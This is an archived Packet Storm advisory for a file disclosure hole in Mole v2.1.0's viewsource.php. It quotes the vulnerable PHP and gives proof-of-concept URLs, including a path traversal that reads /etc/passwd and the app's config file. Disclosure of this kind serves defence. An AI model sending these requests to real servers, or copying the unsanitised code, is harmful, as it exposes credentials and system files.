ID PACKETSTORM:65292
Type packetstorm
Reporter GolD_M
Modified 2008-04-08T00:00:00
Description
`# Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability
# Script : http://sourceforge.net/project/showfiles.php?group_id=164171
# Vuln Code :
##############################################################################
# <html>
# <head>
# <title>Mole: Template viewer</title>
# <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
# </head>
# <body>
#
# <?php
# $dirn = $_REQUEST['dirn']; <--- XxX
# $fname = $_REQUEST['fname']; <--- XxX
#
#
# highlight_file($dirn.$fname); <--- XxX
# ?>
#
# </body>
# </html>
##############################################################################
# POC :
# /mole_2_1_0/viewsource.php?dirn=include/config.inc.php
# /mole_2_1_0/viewsource.php?fname=include/config.inc.php
# /mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd
##############################################################################
# Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr
##############################################################################
`
{"sourceHref": "https://packetstormsecurity.com/files/download/65292/mole-disclose.txt", "sourceData": "`# Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability \n# Script : http://sourceforge.net/project/showfiles.php?group_id=164171 \n# Vuln Code : \n############################################################################## \n# <html> \n# <head> \n# <title>Mole: Template viewer</title> \n# <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\"> \n# </head> \n# <body> \n# \n# <?php \n# $dirn = $_REQUEST['dirn']; <--- XxX \n# $fname = $_REQUEST['fname']; <--- XxX \n# \n# \n# highlight_file($dirn.$fname); <--- XxX \n# ?> \n# \n# </body> \n# </html> \n############################################################################## \n# POC : \n# /mole_2_1_0/viewsource.php?dirn=include/config.inc.php \n# /mole_2_1_0/viewsource.php?fname=include/config.inc.php \n# /mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd \n############################################################################## \n# Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr \n############################################################################## \n \n`\n", "edition": 1, "references": [], "modified": "2008-04-08T00:00:00", "hash": "2032371135ee29c0d56f327bd2bccc0baa1a653b47cbe458fb8e036428f79f03", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/65292/mole-disclose.txt.html", "description": "", "id": "PACKETSTORM:65292", "reporter": "GolD_M", "lastseen": "2016-11-03T10:18:01", "published": "2008-04-08T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "mole-disclose.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "82fa0611e939b926ed206ac3e50d536a", "key": "href"}, {"hash": "064c780fdff0455f3a316670cc398713", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "064c780fdff0455f3a316670cc398713", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "cfd50f14339be9c489e64f9673400655", "key": "reporter"}, {"hash": "2e051bfad015de220d22104a0dabf6c9", "key": "sourceData"}, {"hash": "de6747413793be1ffebb41e63ca020bb", "key": "sourceHref"}, {"hash": "a636b34a5b66808eb7e38da47918e980", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}
